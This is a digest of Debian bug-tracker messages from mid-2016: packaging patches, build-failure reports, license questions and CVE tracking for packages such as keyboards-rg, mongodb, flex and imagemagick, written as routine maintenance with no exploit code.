Processed: Re: keyboards-rg: Removal of debhelper compat 4

[Debian Bug Tracking System]

Processing control commands:

> tags -1 patch
Bug #817511 [src:keyboards-rg] keyboards-rg: Removal of debhelper compat 4
Added tag(s) patch.

-- 
817511: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=817511
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#817511: keyboards-rg: Removal of debhelper compat 4

[Logan Rosen]

Control: tags -1 patch

Dear Maintainer,

In Ubuntu, the attached patch was applied to achieve the following:

  * debian/rules: Convert to dh sequencer.
  * debian/compat: Indicate compatibility level of 9.
  * debian/control:
- Build-depend on debhelper (>= 9).
- Depend on ${misc:Depends}.
  * debian/source/format: Indicate 3.0 (native) format.
  * debian/install: Indicate files needing installing.
  * debian/dirs: Remove, as it is now unnecessary.

Thanks for considering the patch.

Logan Rosen
diff -Nru keyboards-rg-0.2/debian/compat keyboards-rg-0.2ubuntu1/debian/compat
--- keyboards-rg-0.2/debian/compat	1969-12-31 19:00:00.0 -0500
+++ keyboards-rg-0.2ubuntu1/debian/compat	2016-07-31 21:02:41.0 -0400
@@ -0,0 +1 @@
+9
diff -Nru keyboards-rg-0.2/debian/control keyboards-rg-0.2ubuntu1/debian/control
--- keyboards-rg-0.2/debian/control	2006-08-31 14:35:59.0 -0400
+++ keyboards-rg-0.2ubuntu1/debian/control	2016-08-01 01:09:57.0 -0400
@@ -2,13 +2,13 @@
 Section: misc
 Priority: optional
 Maintainer: Radovan Garabík 
-Build-Depends: debhelper (>> 4)
+Build-Depends: debhelper (>= 9)
 Standards-Version: 3.7.2
 
 Package: keyboards-rg
 Architecture: all
 Suggests: xbase-clients
-Depends: xserver-xorg, xkb-data (>=0.8-8)
+Depends: ${misc:Depends}, xserver-xorg, xkb-data (>=0.8-8)
 Description: Various keyboard layouts for X-window and linux console
  keyboards-rg includes several keyboard layouts. Currently there is
  a Slovak programmers keyboard, Pan-cyrillic yawerty keyboard with
diff -Nru keyboards-rg-0.2/debian/dirs keyboards-rg-0.2ubuntu1/debian/dirs
--- keyboards-rg-0.2/debian/dirs	2006-08-31 14:35:22.0 -0400
+++ keyboards-rg-0.2ubuntu1/debian/dirs	1969-12-31 19:00:00.0 -0500
@@ -1,3 +0,0 @@
-usr/share/X11/xkb/symbols
-usr/share/keymaps/i386/qwerty
-usr/bin
diff -Nru keyboards-rg-0.2/debian/install keyboards-rg-0.2ubuntu1/debian/install
--- keyboards-rg-0.2/debian/install	1969-12-31 19:00:00.0 -0500
+++ keyboards-rg-0.2ubuntu1/debian/install	2016-08-01 00:53:52.0 -0400
@@ -0,0 +1,3 @@
+layouts-console/* usr/share/keymaps/i386/qwerty
+layouts-xkb/* usr/share/X11/xkb/symbols
+scripts/* usr/bin
diff -Nru keyboards-rg-0.2/debian/rules keyboards-rg-0.2ubuntu1/debian/rules
--- keyboards-rg-0.2/debian/rules	2006-08-31 14:20:36.0 -0400
+++ keyboards-rg-0.2ubuntu1/debian/rules	2016-07-31 21:01:11.0 -0400
@@ -1,86 +1,3 @@
 #!/usr/bin/make -f
-# Sample debian/rules that uses debhelper.
-# GNU copyright 1997 to 1999 by Joey Hess.
-
-# Uncomment this to turn on verbose mode.
-#export DH_VERBOSE=1
-
-# This is the debhelper compatability version to use.
-export DH_COMPAT=4
-
-configure: configure-stamp
-configure-stamp:
-	dh_testdir
-	# Add here commands to configure the package.
-	
-
-	touch configure-stamp
-
-build: configure-stamp build-stamp
-build-stamp:
-	dh_testdir
-
-	# Add here commands to compile the package.
-	#$(MAKE)
-
-	touch build-stamp
-
-clean:
-	dh_testdir
-	dh_testroot
-	rm -f build-stamp configure-stamp
-
-	# Add here commands to clean up after the build process.
-	#-$(MAKE) clean
-
-	dh_clean
-
-install: build
-	dh_testdir
-	dh_testroot
-	dh_clean -k
-	dh_installdirs
-
-	# Add here commands to install the package into debian/keyboards-rg.
-	#$(MAKE) install DESTDIR=$(CURDIR)/debian/keyboards-rg
-	cp -v -f layouts-console/* $(CURDIR)/debian/keyboards-rg/usr/share/keymaps/i386/qwerty
-	cp -v -f layouts-xkb/* $(CURDIR)/debian/keyboards-rg/usr/share/X11/xkb/symbols
-	cp -v -f scripts/* $(CURDIR)/debian/keyboards-rg/usr/bin
-
-
-# Build architecture-independent files here.
-binary-indep: build install
-# We have nothing to do by default.
-
-# Build architecture-dependent files here.
-binary-arch: build install
-	dh_testdir
-	dh_testroot
-#	dh_installdebconf	
-	dh_installdocs
-	#dh_installexamples
-	#dh_installmenu
-#	dh_installlogrotate
-#	dh_installemacsen
-#	dh_installpam
-#	dh_installmime
-#	dh_installinit
-	#dh_installcron
-	#dh_installman
-	#dh_installinfo
-#	dh_undocumented
-	dh_installchangelogs 
-	dh_link
-	#dh_strip
-	dh_compress
-	dh_fixperms
-#	dh_makeshlibs
-	dh_installdeb
-#	dh_perl
-	dh_shlibdeps
-	dh_gencontrol
-	dh_md5sums
-	dh_builddeb
-
-binary: binary-indep binary-arch
-.PHONY: build clean binary-indep binary-arch binary install configure
+%:
+	dh $@
diff -Nru keyboards-rg-0.2/debian/source/format keyboards-rg-0.2ubuntu1/debian/source/format
--- keyboards-rg-0.2/debian/source/format	1969-12-31 19:00:00.0 -0500
+++ keyboards-rg-0.2ubuntu1/debian/source/format	2016-07-31 21:05:14.0 -0400
@@ -0,0 +1 @@
+3.0 (native)

Processed: tagging 833087, bug 833087 is forwarded to https://jira.mongodb.org/browse/SERVER-9476 ...

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 833087 + upstream fixed-upstream
Bug #833087 [mongodb-server] bruteforcable challenge responses in unprotected 
logfile
Added tag(s) upstream and fixed-upstream.
> forwarded 833087 https://jira.mongodb.org/browse/SERVER-9476
Bug #833087 [mongodb-server] bruteforcable challenge responses in unprotected 
logfile
Set Bug forwarded-to-address to 'https://jira.mongodb.org/browse/SERVER-9476'.
> notfound 833087 2.4.10-5
Bug #833087 [mongodb-server] bruteforcable challenge responses in unprotected 
logfile
There is no source info for the package 'mongodb-server' at version '2.4.10-5' 
with architecture ''
Unable to make a source version for version '2.4.10-5'
No longer marked as found in versions 2.4.10-5.
> # fix found version
> found 833087 1:2.4.10-5
Bug #833087 [mongodb-server] bruteforcable challenge responses in unprotected 
logfile
Marked as found in versions mongodb/1:2.4.10-5.
> # fixed upstream since 2.5.4
> fixed 833087 1:2.6.11-1
Bug #833087 [mongodb-server] bruteforcable challenge responses in unprotected 
logfile
Marked as fixed in versions mongodb/1:2.6.11-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833087: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833087
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#665334: [Pkg-fonts-devel] Bug#665334: non-DFSG postscript embedded in fontforge (currently August 2014)

[Daniel Kahn Gillmor]

Hi Vasudev--

On Sat 2016-07-30 03:17:01 -0400, Vasudev Kamath wrote:

> Do you still find this problem in latest fontforge in Debian
> experimental?.. I did a quick search in fontforge/othersubrs.c file I
> did not find exact license text you posted.

I don't see that license text either, but there are several weird
references to adobe in fontforge/othersubrs.c which i don't really know
how to interpret clearly.

> Since I became the new maintainer of fontforge, this bug popped up on my
> Maintainer Dashboard :-). So wondering if this issue still affects
> fontforge or not.

well, the specific text i pointed out as problematic is gone.  But there
are still provocative statements like:

  These subroutines are code by Adobe for this exact use (from
  T1_Spec.pdf)


or:

  static const char *copyright[] = {
"% Copyright (c) 1987-1990 Adobe Systems Incorporated.",
"% All Rights Reserved.",
"% This code to be used for Flex and hint replacement.",
"% Version 1.1",
NULL
  };


but i confess i've lost track of how to interpret them, sorry :(

--dkg

Processed: found 833101 in 8:6.7.7.10-4

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> # mark as found in anchestor
> found 833101 8:6.7.7.10-4
Bug #833101 [src:imagemagick] DOS by not releasing memory
Marked as found in versions imagemagick/8:6.7.7.10-4.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833101: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833101
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#832908: mongodb: CVE-2016-6494: world-readable .dbshell history file: LTS update and upgrade handling

[Chris Lamb]

> 2) How do you plan to handle the "upgrade case" that is will you try to
> change the permission on already created history file or will you just
> handle the creation case?

For redis, what I did was set and then unset the umask (for creation) and
chmod(2) the file afterwards to "upgrade" existing ones.

I don't recommend a postinst approach (ie. chmod 0600 /home/*/.filename) for
various reasons.


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

Bug#830729: [pkg-go] Bug#830729: Bug#830729: golang-github-mitchellh-go-homedir: FTBFS: homedir_test.go:44: "/home/lamby" != "~"

[Chris Lamb]

> I've tracked this down to lack of a $USER environment variable

Ah, good catch :)


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

Bug#708956: [jwhois] GFDL non free license

[Yuan-Chen Cheng]

Hi, I write a email to bug-jwh...@gnu.org last week but get no reply.

Shall we just remove those two file from the install list and live with that ?

I am interested to provide patch to do that if that’s the possible and legal 
way to do.

thanks, YC

Bug#830729: [pkg-go] Bug#830729: Bug#830729: golang-github-mitchellh-go-homedir: FTBFS: homedir_test.go:44: "/home/lamby" != "~"

[Potter, Tim (HPE Linux Support)]

On 20 Jul 2016, at 6:35 PM, Chris Lamb  wrote:
> 
>> My _hunch_ is that whatever you're using to build (pbuilder perhaps?)
>> is running as your user ("lamby") but not including "/etc/passwd" from
>> your host
> 
> It is running as my user and /etc/passwd includes:
> 
>  lamby:x:1000:1000:,,,:/home/lamby:/bin/bash
> 
> .. so, alas, that's not the problem.
> 
> (am using Docker, not pbuilder)

I've tracked this down to lack of a $USER environment variable, either in a 
Docker container, or
by some other means.

> cmd := exec.Command("sh", "-c", "eval echo ~$USER")

Patch attached to fix this, but it's a bit icky (and has been replaced by a 
shell out to call
getent in a later version.


Tim.


830729-golang-github-mitchellh-go-homedir.patch
Description: Binary data


signature.asc
Description: Message signed with OpenPGP using GPGMail

Processed: your mail

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 830729 +patch
Bug #830729 [src:golang-github-mitchellh-go-homedir] 
golang-github-mitchellh-go-homedir: FTBFS: homedir_test.go:44: "/home/lamby" != 
"~"
Added tag(s) patch.
>
End of message, stopping processing here.

Please contact me if you need assistance.
-- 
830729: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830729
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#831184: mumble: FTBFS with GCC 6, seems Ice related

[Chris Knadle]

Greetings.

Unfortunately Mumble in Debian won't compile with GCC-6 right now:

   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831184

After talking to Mikkel Krautz (mumble upstream) I tried adding the
following to the unix {} block in murmur.pro:

QMAKE_CXXFLAGS *= -std=c++11

but unfortunately this doesn't seem to help.  I'm adding the maintainers
of zero-ice hoping that we can jointly track down how to fix this.

Thanks.

   -- Chris

-- 
Chris Knadle
chris.kna...@coredump.us

partital build failure log (with the excepiton of the -std=c++11 switch
it looks the same as the log Lucas Nussbaum supplied in the bug):

---
[...]
g++ -c -include release/murmurd -m64 -pipe -g -O2
-fstack-protector-strong -Wformat -Werror=format-security -Wfatal-errors
-fvisibility=hidden -g -std=c++11 -O2 -Wall -W -D_REENTRANT
-DNO_UPDATE_CHECK -DPLUGIN_PATH=/usr/lib/mumble
-DMUMBLE_VERSION=1.2.16-1 -DHAVE_LIMITS_H -DHAVE_ENDIAN_H
-DRESTRICT=__restrict__ -D_FORTIFY_SOURCE=2
-DMUMBLE_VERSION_STRING=1.2.16 -DMURMUR -DUSE_DBUS -DUSE_ICE
-DUSE_BONJOUR -D_REENTRANT -DQT_NO_DEBUG -DQT_SQL_LIB -DQT_XML_LIB
-DQT_NETWORK_LIB -DQT_CORE_LIB -DQT_SHARED
-I/usr/share/qt4/mkspecs/linux-g++-64 -I. -I/usr/include/qt4/QtCore
-I/usr/include/qt4/QtNetwork -I/usr/include/qt4/QtXml
-I/usr/include/qt4/QtSql -I/usr/include/qt4 -I/usr/include/qt4/QtDBus
-I../../src -I. -I/usr/include/speech-dispatcher -I../bonjour -Irelease
-I/usr/include/avahi-compat-libdns_sd -o release/moc_BonjourServer.o
release/moc_BonjourServer.cpp

g++ -m64 -Wl,-z,relro -Wl,-z,relro -Wl,-z,now -Wl,-O1 -o
../../release/murmurd release/ACL.o release/Group.o release/Channel.o
release/Connection.o release/User.o release/Timer.o release/CryptState.o
release/OSInfo.o release/Net.o release/SSL.o release/Version.o
release/main.o release/Server.o release/ServerUser.o release/ServerDB.o
release/Register.o release/Cert.o release/Messages.o release/Meta.o
release/RPC.o release/UnixMurmur.o release/DBus.o release/MurmurIce.o
release/BonjourServiceRegister.o release/BonjourServer.o
release/Mumble.pb.o release/Murmur.o release/moc_ACL.o
release/moc_Channel.o release/moc_Connection.o release/moc_Server.o
release/moc_ServerUser.o release/moc_Meta.o release/moc_UnixMurmur.o
release/moc_DBus.o release/moc_MurmurIce.o
release/moc_BonjourServiceRegister.o release/moc_BonjourServer.o
-L../../release -L/usr/lib/x86_64-linux-gnu -lprotobuf -lcap -lIce
-lIceUtil -lQtDBus -lssl -lcrypto -ldns_sd -lavahi-common -lavahi-client
-lpthread -lQtSql -lQtXml -lQtNetwork -lQtCore

release/Murmur.o: In function
`IceInternal::Cpp11FnCallbackNC::~Cpp11FnCallbackNC()':

/usr/include/Ice/Proxy.h:95: undefined reference to `vtable for
IceInternal::Cpp11FnCallbackNC'

/usr/include/Ice/Proxy.h:95: undefined reference to `vtable for
IceInternal::Cpp11FnCallbackNC'

/usr/include/Ice/Proxy.h:95: undefined reference to `vtable for
IceInternal::Cpp11FnCallbackNC'

/usr/include/Ice/Proxy.h:95: undefined reference to `vtable for
IceInternal::Cpp11FnCallbackNC'

/usr/include/Ice/Proxy.h:95: undefined reference to `vtable for
IceInternal::Cpp11FnCallbackNC'

release/Murmur.o:/usr/include/Ice/Proxy.h:95: more undefined references
to `vtable for IceInternal::Cpp11FnCallbackNC' follow
release/Murmur.o: In function `Cpp11CB':

/<>/src/murmur/Murmur.cpp:7028: undefined reference to
`IceInternal::Cpp11FnCallbackNC::Cpp11FnCallbackNC(std::function const&, std::function const&)'
[...]
---

Processed: dh_bash-completion: lowering severity and wontfix

[Debian Bug Tracking System]

Processing control commands:

> severity -1 wishlist
Bug #785271 [bash-completion] dh_bash-completion script/file list autodetection 
fails hiding bugs which can become RC
Severity set to 'wishlist' from 'serious'
> tags -1 + wontfix
Bug #785271 [bash-completion] dh_bash-completion script/file list autodetection 
fails hiding bugs which can become RC
Added tag(s) wontfix.

-- 
785271: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=785271
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#785271: dh_bash-completion: lowering severity and wontfix

[Andreas Henriksson]

Control: severity -1 wishlist
Control: tags -1 + wontfix

Hello!

Given the lack of followup on my previous mail I'm following up
with setting what I consider the correct severity for this bug
report. While at it I'm also tagging wontfix as I don't think
there are any volunteers to work on redesigning the helper
(which existance is kind of questionable since in my view
it doesn't bring much more than dh_install with additional
rename support, which if needed dh-exec is a more flexible and
general solution for anyway).

Regards,
Andreas Henriksson

Bug#832573: iproute uninstallable as it serves a file from another package (ifstat)

[Laurent Bigonville]

On Wed, 27 Jul 2016 06:51:58 +0100 Klaus Ethgen  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA512
>
> New iproute package is uninstallable as it serves the file
> /usr/bin/ifstat which is also in the package ifstat.
>
> Version 4.6.0-1 was fine.
>

Well that was a mistake from my part,

But, FTR, I'm wondering if ifstat package shouldn't be removed from the 
archive, it doesn't seem maintained upstream (last release is 2004)



There is ATM a sponsoring request for ifstat to fix RC bugs, see: 
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830788#24

Processed: tagging 830842

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 830842 + sid stretch jessie
Bug #830842 {Done: Emilio Pozuelo Monfort } [gnome-maps] 
gnome-maps: MapQuest direct tile access has been discontinued
Added tag(s) stretch, sid, and jessie.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
830842: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830842
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 833023

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 833023 + sid
Bug #833023 [src:linbox] linbox: B-D on libgivaro-dev (<< 3.8.0), but sid has 
4.0.1-3
Added tag(s) sid.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
833023: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=833023
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#832768: marked as done (flex: CVE-2016-6354: buffer overflow in generated code (yy_get_next_buffer))

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 22:54:05 +
with message-id 
and subject line Bug#832768: fixed in flex 2.6.1-1
has caused the Debian Bug report #832768,
regarding flex: CVE-2016-6354: buffer overflow in generated code 
(yy_get_next_buffer)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
832768: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832768
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: flex
Version: 2.5.39-8
Severity: grave
Tags: security upstream patch

Hi,

the following vulnerability was published for flex, fixing this as
grave. It is possible to exploit this remotely, but depending othe
application that is build using flex. And there might be furthermore
sources with shipped lexers built with the broken flex version. All of
those was not investigated.

CVE-2016-6354[0]:
Buffer overflow in generated code (yy_get_next_buffer); related to num_to_read

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-6354
[1] 
https://github.com/westes/flex/commit/a5cbe929ac3255d371e698f62dc256afe7006466

Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: flex
Source-Version: 2.6.1-1

We believe that the bug you reported is fixed in the latest version of
flex, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 832...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Manoj Srivastava  (supplier of updated flex package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Fri, 29 Jul 2016 18:07:24 -0700
Source: flex
Binary: flex flex-doc libfl-dev
Architecture: source amd64 all
Version: 2.6.1-1
Distribution: unstable
Urgency: low
Maintainer: Manoj Srivastava 
Changed-By: Manoj Srivastava 
Description:
 flex   - fast lexical analyzer generator
 flex-doc   - Documentation for flex (a fast lexical analyzer generator)
 libfl-dev  - static library for flex (a fast lexical analyzer generator)
Closes: 832768
Changes:
 flex (2.6.1-1) unstable; urgency=low
 .
   * New upstream version. The development of flex ias transitionaing to
 github; updated the watch file.
   * Bug fix: "CVE-2016-6354: buffer overflow in generated code
 (yy_get_next_buffer)", thanks to Salvatore Bonaccorso. The latest
 upstream has this bug fixed.  (Closes: #832768).
Checksums-Sha1:
 d6130d4494022d06bba5efbb638084bb07ee0253 1889 flex_2.6.1-1.dsc
 be0ffa90a3c28530922bffaffd2925acf6c4c5cc 994826 flex_2.6.1.orig.tar.gz
 11195c84e6d94a18873feb55bdba933a8fc5261b 31804 flex_2.6.1-1.diff.gz
 6e021814187027de39f93b0da424cff8c0805ce1 130840 flex-dbgsym_2.6.1-1_amd64.deb
 cefee5ebc9eeb58dcd83fece8dd67af2ff929f60 753756 flex-doc_2.6.1-1_all.deb
 11316d00420d24a44cda1ce21c16422fb1102c49 428350 flex_2.6.1-1_amd64.deb
 de0c0d525e9506e3feba6e8f38aa19b91a3c458a 2940 
libfl-dev-dbgsym_2.6.1-1_amd64.deb
 2081499aaedd716fba52971ad3b17b250aaba8fc 92492 libfl-dev_2.6.1-1_amd64.deb
Checksums-Sha256:
 e595cb500a5258cabf0eae9b81aa2b84c60efb669fcddc50edd39da26169e991 1889 
flex_2.6.1-1.dsc
 45ca57aa8c9c2539bc201f602279d8730d20450514b36e867853e212c0e55438 994826 
flex_2.6.1.orig.tar.gz
 4a9de3866cbc841e31106359af2e908eb35d3dc03036d18ec55d1773cecdc985 31804 
flex_2.6.1-1.diff.gz
 00d9f0357c48c90a5593733ae8038bb39378a7340bac9c125bf81c751f4ed233 130840 
flex-dbgsym_2.6.1-1_amd64.deb
 d6d6f950fa50c2f702e608fd090d58417b0d3ac7f862e2d60741ff6fc1ae0fae 753756 
flex-doc_2.6.1-1_all.deb
 4e184403162a4aaff93fa989735200c1fb7db357d6700b48e96c832dc9f74051 428350 
flex_2.6.1-1_amd64.deb
 6829a67cccd045d54ba002311443e4846474ad5c8205d8f1b6713becbd56 2940 
libfl-dev-dbgsym_2.6.1-1_amd64.deb
 0f2fcaad0fb5547459015db5e0a6e54c1ccac5f7d844fa2f363a1636a8de7f2b 92492 
libfl-dev_2.6.1-1_amd64.deb
Files:
 5ea662a34b1518690e86fc974e5c4aa3 1889 devel optional flex_2.6.1-1.dsc
 2644e6bd293ad29d0f24d280a033976b 994826 devel optional flex_2.6.1.orig.tar.gz
 

Bug#830634: marked as pending

[W . Martin Borgert]

tag 830634 pending
thanks

Hello,

Bug #830634 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:


http://git.debian.org/?p=python-modules/packages/python-activipy.git;a=commitdiff;h=6651383

---
commit 6651383ebe295e0f05867e90192afb72c3dd83a9
Author: W. Martin Borgert 
Date:   Sun Jul 31 22:29:48 2016 +0200

prepare 0.1-3 (fix test run, bump standards)

diff --git a/debian/changelog b/debian/changelog
index ba61284..c9d2ec6 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,10 @@
+python-activipy (0.1-3) unstable; urgency=medium
+
+  * Run tests in source dir, not in .pybuild dir (Closes: #830634).
+  * Bump standards version, no changes.
+
+ -- W. Martin Borgert   Sun, 31 Jul 2016 20:27:39 +
+
 python-activipy (0.1-2) unstable; urgency=low
 
   * Fix build-dep on pytest, thanks to Chris West (Closes: #806477).

Processed: Bug#830634 marked as pending

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tag 830634 pending
Bug #830634 {Done: deba...@debian.org (W. Martin Borgert)} 
[src:python-activipy] python-activipy: FTBFS: E: pybuild pybuild:274: test: 
plugin distutils failed with: exit code=5:
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
830634: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830634
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#832908: mongodb: CVE-2016-6494: world-readable .dbshell history file: LTS update and upgrade handling

[Ola Lundqvist]

Hi

I'm member of the Long Term Security team in Debian and I'm following this
as I plan to backport the correction to wheezy.

I have a few questions:
1) When do you think you will have a correction available that I can have a
look at?
2) How do you plan to handle the "upgrade case" that is will you try to
change the permission on already created history file or will you just
handle the creation case?
3) If you plan to handle the "upgrade case" will you just change it in case
the file is world readable? I mean some may want this group readable for
some reason.
4) Or do you plan to just change the umask from the default?
5) In case you just handle the creation case do you think it should be
handled in upgrade in some way, or should we document this in the security
advisory?

Thanks in advance

// Ola


-- 
 --- Inguza Technology AB --- MSc in Information Technology 
/  o...@inguza.comFolkebogatan 26\
|  o...@debian.org   654 68 KARLSTAD|
|  http://inguza.com/Mobile: +46 (0)70-332 1551 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
 ---

Bug#830634: marked as done (python-activipy: FTBFS: E: pybuild pybuild:274: test: plugin distutils failed with: exit code=5:)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 22:12:58 +
with message-id 
and subject line Bug#830634: fixed in python-activipy 0.1-3
has caused the Debian Bug report #830634,
regarding python-activipy: FTBFS: E: pybuild pybuild:274: test: plugin 
distutils failed with: exit code=5:
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
830634: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=830634
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: python-activipy
Version: 0.1-2
Severity: serious
Justification: fails to build from source
User: reproducible-bui...@lists.alioth.debian.org
Usertags: ftbfs
X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org

Dear Maintainer,

python-activipy fails to build from source in unstable/amd64:

  [..]

python-pygments python-pytest python-roman python-setuptools python-sphinx
python-tz python3-all python3-pkg-resources python3-py python3-pytest
python3-setuptools sgml-base sphinx-common xml-core xsltproc
  0 upgraded, 30 newly installed, 0 to remove and 0 not upgraded.
  1 not fully installed or removed.
  Need to get 8383 kB of archives.
  After this operation, 49.3 MB of additional disk space will be used.
  Get:1 http://httpredir.debian.org/debian sid/main amd64 python-all amd64 
2.7.11-2 [938 B]
  Get:2 http://httpredir.debian.org/debian sid/main amd64 python-setuptools all 
20.10.1-1.1 [203 kB]
  Get:3 http://httpredir.debian.org/debian sid/main amd64 python-alabaster all 
0.7.8-1 [18.4 kB]
  Get:4 http://httpredir.debian.org/debian sid/main amd64 
python-babel-localedata all 2.3.4+dfsg.1-2 [3402 kB]
  Get:5 http://httpredir.debian.org/debian sid/main amd64 python-tz all 
2015.7+dfsg-0.1 [33.6 kB]
  Get:6 http://httpredir.debian.org/debian sid/main amd64 python-babel all 
2.3.4+dfsg.1-2 [82.5 kB]
  Get:7 http://httpredir.debian.org/debian sid/main amd64 python-roman all 
2.0.0-2 [8130 B]
  Get:8 http://httpredir.debian.org/debian sid/main amd64 sgml-base all 1.28 
[14.7 kB]
  Get:9 http://httpredir.debian.org/debian sid/main amd64 xml-core all 
0.13+nmu2 [24.2 kB]
  Get:10 http://httpredir.debian.org/debian sid/main amd64 docutils-common all 
0.12+dfsg-1 [185 kB]
  Get:11 http://httpredir.debian.org/debian sid/main amd64 python-docutils all 
0.12+dfsg-1 [361 kB]
  Get:12 http://httpredir.debian.org/debian sid/main amd64 python-imagesize all 
0.7.1-1 [3814 B]
  Get:13 http://httpredir.debian.org/debian sid/main amd64 python-markupsafe 
amd64 0.23-2+b2 [15.9 kB]
  Get:14 http://httpredir.debian.org/debian sid/main amd64 python-jinja2 all 
2.8-1 [111 kB]
  Get:15 http://httpredir.debian.org/debian sid/main amd64 python-pygments all 
2.1.3+dfsg-1 [535 kB]
  Get:16 http://httpredir.debian.org/debian sid/main amd64 libjs-jquery all 
1.12.4-1 [167 kB]
  Get:17 http://httpredir.debian.org/debian sid/main amd64 libjs-underscore all 
1.7.0~dfsg-1 [49.9 kB]
  Get:18 http://httpredir.debian.org/debian sid/main amd64 libjs-sphinxdoc all 
1.4.4-3 [65.2 kB]
  Get:19 http://httpredir.debian.org/debian sid/main amd64 sphinx-common all 
1.4.4-3 [346 kB]
  Get:20 http://httpredir.debian.org/debian sid/main amd64 python-sphinx all 
1.4.4-3 [427 kB]
  Get:21 http://httpredir.debian.org/debian sid/main amd64 python3-all amd64 
3.5.1-4 [928 B]
  Get:22 http://httpredir.debian.org/debian sid/main amd64 
python3-pkg-resources all 20.10.1-1.1 [112 kB]
  Get:23 http://httpredir.debian.org/debian sid/main amd64 python3-setuptools 
all 20.10.1-1.1 [122 kB]
  Get:24 http://httpredir.debian.org/debian sid/main amd64 python-py all 
1.4.31-1 [81.8 kB]
  Get:25 http://httpredir.debian.org/debian sid/main amd64 python-pytest all 
2.9.2-1 [166 kB]
  Get:26 http://httpredir.debian.org/debian sid/main amd64 python3-py all 
1.4.31-1 [81.9 kB]
  Get:27 http://httpredir.debian.org/debian sid/main amd64 python3-pytest all 
2.9.2-1 [167 kB]
  Get:28 http://httpredir.debian.org/debian sid/main amd64 docbook-xsl all 
1.79.1+dfsg-1 [1249 kB]
  Get:29 http://httpredir.debian.org/debian sid/main amd64 libxslt1.1 amd64 
1.1.28-4 [231 kB]
  Get:30 http://httpredir.debian.org/debian sid/main amd64 xsltproc amd64 
1.1.28-4 [118 kB]
  Fetched 8383 kB in 0s (71.7 MB/s)
  Selecting previously unselected package python-all.
  (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database 

Processed: limit source to imagemagick, tagging 831034, tagging 833101, tagging 832793, tagging 833099 ...

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> limit source imagemagick
Limiting to bugs with field 'source' containing at least one of 'imagemagick'
Limit currently set to 'source':'imagemagick'

> tags 831034 + pending
Bug #831034 [src:imagemagick] imagemagick: CVE-2016-5841 CVE-2016-5842
Added tag(s) pending.
> tags 833101 + pending
Bug #833101 [src:imagemagick] DOS by not releasing memory
Added tag(s) pending.
> tags 832793 + pending
